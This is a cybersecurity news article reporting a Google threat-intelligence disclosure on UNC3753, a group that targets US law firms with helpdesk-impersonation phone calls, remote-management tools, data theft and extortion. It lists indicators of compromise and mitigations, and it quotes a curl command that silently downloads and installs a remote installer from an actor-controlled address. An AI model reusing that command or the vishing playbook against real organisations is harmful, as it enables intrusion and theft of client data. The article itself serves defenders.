UNC3753 Targets US Law Firms with Vishing and RMM Tools

UNC3753 Targets US Law Firms with Vishing and RMM Tools

Mandiant’s Google Threat Intelligence Group (GTIG) has disclosed an active financially motivated campaign by threat cluster UNC3753, also tracked as “Luna Moth,” “Chatty Spider,” and “Silent Ransom Group,” targeting dozens of US-based professional, legal, and financial services organizations.

The campaign combines voice phishing (vishing), remote monitoring and management (RMM) tool abuse, and in some cases, physical office intrusions to exfiltrate sensitive client data for extortion.

In multiple Mandiant-investigated incidents, the full attack sequence from initial contact to data theft and extortion was completed within a single business day. In some cases, data staging and exfiltration began in under an hour.

The campaign begins with benign invoice-themed emails sent from actor-controlled consumer accounts.

UNC3753 Targets US Law Firms

These messages carry no malicious links or attachments, simply using a pretext such as “hello, here is the invoice we talked about yesterday” to prime targets for a follow-up phone call.

Threat actors then impersonate internal IT helpdesk staff or security teams, initiating voice phishing (vishing) calls to employees whose contact details are harvested directly from corporate websites, Google said.

Once a target is convinced, they are guided to join a screen-sharing session via Zoom, Microsoft Teams, or Quick Assist.

Unc3753 attack lifecycle

Threat actors then instruct victims to download commercial RMM agents, including AnyDesk, Bomgar, Zoho Assist, and SuperOps, to establish persistent remote access.

To deliver installation links without leaving an endpoint footprint, UNC3753 consistently uses Privnote, a self-destructing message platform. A representative cURL staging command observed in live sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

After gaining initial access, threat actors pivot through BYOD endpoints into corporate virtual desktop infrastructure (VDI), leveraging clients such as Windows365.exe and Citrix.

Inside the VDI environment, they enumerate OneDrive folders, mapped network drives, and specifically target iManage document repositories using keyword searches to locate W-2 forms, W-9s, 1099s, Social Security numbers, client legal agreements, and audit records.

Exfiltration methods include direct browser-based uploads to threat actor-controlled Google Drive accounts, WinSCP and Rclone for bulk FTP/SFTP transfers, and instructing victims to email staged files to actor-controlled addresses.

In one notable incident, attackers exfiltrated 1.7 GB via Google Drive before pivoting to exfiltrate an additional 14.4 GB using WinSCP.

In a significant tactical escalation corroborated by an FBI Cyber FLASH Alert, individuals posing as IT technicians have physically entered corporate offices attempting to exfiltrate data via USB storage media.

GTIG assesses that these incidents are likely linked to UNC3753 based on structural, timeline, and targeting overlaps representing a convergence of digital and physical threat vectors rarely seen in extortion campaigns.

Within 30 minutes of exiting victim environments, UNC3753 delivers aggressive extortion emails giving organizations just three days to negotiate, GTIG said.

Failure to respond triggers direct outreach to employees and clients, with threats to publish stolen archives on the LEAKEDDATA data leak site (DLS), hosted at hxxps[:]//business-data-leaks[.]com.

UNC3753 has been active since at least March 2022 and shares TTP overlaps with UNC2686, a group behind “BazarCall” campaigns. The cluster notably deployed LOCKBIT.BLACK in 2022 before pivoting to extortion-only operations.

Phishing Domains

  • <organization>-itdesk[.]com
  • <organization>-it[.]com
  • <organization>-helpdesk[.]com

Indicators of Compromise (IOCs) 

IOC TypeIndicator
IPv4 Address192.236.147.131
IPv4 Address192.236.147.138
IPv4 Address193.141.60.212
IPv4 Address192.236.154.158
IPv4 Address192.236.146.173
IPv4 Address174.169.162.62
IPv4 Address64.94.84.97

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Mitigation

  • Enforce application control policies (e.g., WDAC) to block unauthorized RMM binaries
  • Disable USB read/write via GPO or MDM across all corporate and BYOD endpoints
  • Enable MFA on iManage, SharePoint, and corporate VDI entry points
  • Monitor SSH/Port 22 traffic for high-volume WinSCP/Rclone transfers from internal VDIs

Legal and professional services firms remain prime targets for extortion due to their concentration of highly sensitive client data and acute reputational exposure. UNC3753’s integration of vishing, RMM abuse, and now physical intrusions signals.

Follow us on Google News , LinkedIn and X to Get More Instant UpdatesSet Cyberpress as a Preferred Source in Google.

The post UNC3753 Targets US Law Firms with Vishing and RMM Tools appeared first on Cyber Security News.


Discover more from RSS Feeds Cloud

Subscribe to get the latest posts sent to your email.

Discover more from RSS Feeds Cloud

Subscribe now to keep reading and get access to the full archive.

Continue reading